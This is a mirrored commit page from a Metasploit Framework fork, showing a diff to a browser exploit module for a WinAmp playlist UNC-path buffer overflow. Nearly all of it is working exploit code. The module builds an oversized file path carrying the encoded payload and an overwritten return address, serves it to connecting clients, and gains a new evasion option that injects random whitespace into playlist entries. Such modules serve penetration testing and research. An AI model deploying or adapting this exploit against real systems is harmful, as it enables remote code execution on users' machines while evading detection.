infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

general cleanups 

add space evasions to the playlist


git-svn-id: file:///home/svn/incoming/trunk@3495 4d416f70-5f16-0410-b530-b9f4589650da
unstable
bmc 2006-02-03 18:28:13 +00:00
parent 792b3a8ad4
commit fe608d1676
1 changed files with 29 additions and 15 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

44
modules/exploits/windows/browser/winamp_playlist_unc.rb
View File

@ -21,7 +21,7 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
},
'License' => MSF_LICENSE,
'Author' =>
[
[
'hdm',
'Faithless <rhyskidd [at] gmail.com>'
],
@ -58,6 +58,10 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
],
'DisclosureDate' => 'Jan 29 2006',
'DefaultTarget' => 0))
register_evasion_options([
OptBool.new('PlaylistSpaceInjection', [false, 'Add junk spaces in between each entry item in the playlist"', 'false'])
])
end
def check_dependencies
@ -82,6 +86,8 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the compressed response to the client
send_response(cli, generate_playlist(p), { 'Content-Type' => 'text/plain' })
@ -89,12 +95,9 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
end
def generate_playlist(payload)
pcnt = rand(10)+10;
slen = "%x" % (rand(1024)+30)
name = Rex::Text.rand_text_alphanumeric(rand(32)+1)
file = Rex::Text.rand_text_english(1026)
file[1022 , 4] = [target.ret].pack('V')
file[0, payload.encoded.length] = payload.encoded
@ -102,23 +105,34 @@ class Exploits::Windows::Browser::WinAmp_Playlist_UNC < Msf::Exploit::Remote
play =
"[playlist]\r\n" +
generate_songs(pcnt) +
"File" + (pcnt+1).to_s + "=\\\\#{file}\r\n" +
"Title" + (pcnt+1).to_s + "=#{name}\r\n" +
"Length" + (pcnt+1).to_s + "=#{slen}\r\n" +
"NumberOfEntries=" + (pcnt+1).to_s + "\r\n" +
"Version=2\r\n"
generate_song(pcnt + 1, "\\\\#{file}") +
generate_line('NumberOfEntries', "#{pcnt+1}") +
generate_line('Version', '2')
return play
end
def generate_space
if datastore['PlaylistSpaceInjection'] == true
return Rex::Text.rand_text(rand(100)+1, nil, " \t")
else
return ''
end
end
def generate_song (id, file)
return generate_line("File#{id}", file) +
generate_line("Title#{id}", Rex::Text.rand_text_alphanumeric(rand(64)+1)) +
generate_line("Length#{id}", "%x" % (rand(1024) + 30))
end
def generate_line (key, value)
return generate_space + key + generate_space + '=' + generate_space + value + generate_space + "\r\n"
end
def generate_songs(cnt)
songs = ''
1.upto(cnt) do |i|
name = Rex::Text.rand_text_alphanumeric(rand(64)+1)
file = Rex::Text.rand_text_alphanumeric(rand(64)+1)
slen = "%x" % (rand(1024)+30)
songs << "File" + i.to_s + "=" + file + "\r\n"
songs << "Title" + i.to_s + "=" + name + "\r\n"
songs << "Length" + i.to_s + "=" + slen + "\r\n"
songs << generate_song(i, Rex::Text.rand_text_alphanumeric(rand(64)+1))
end
return songs
end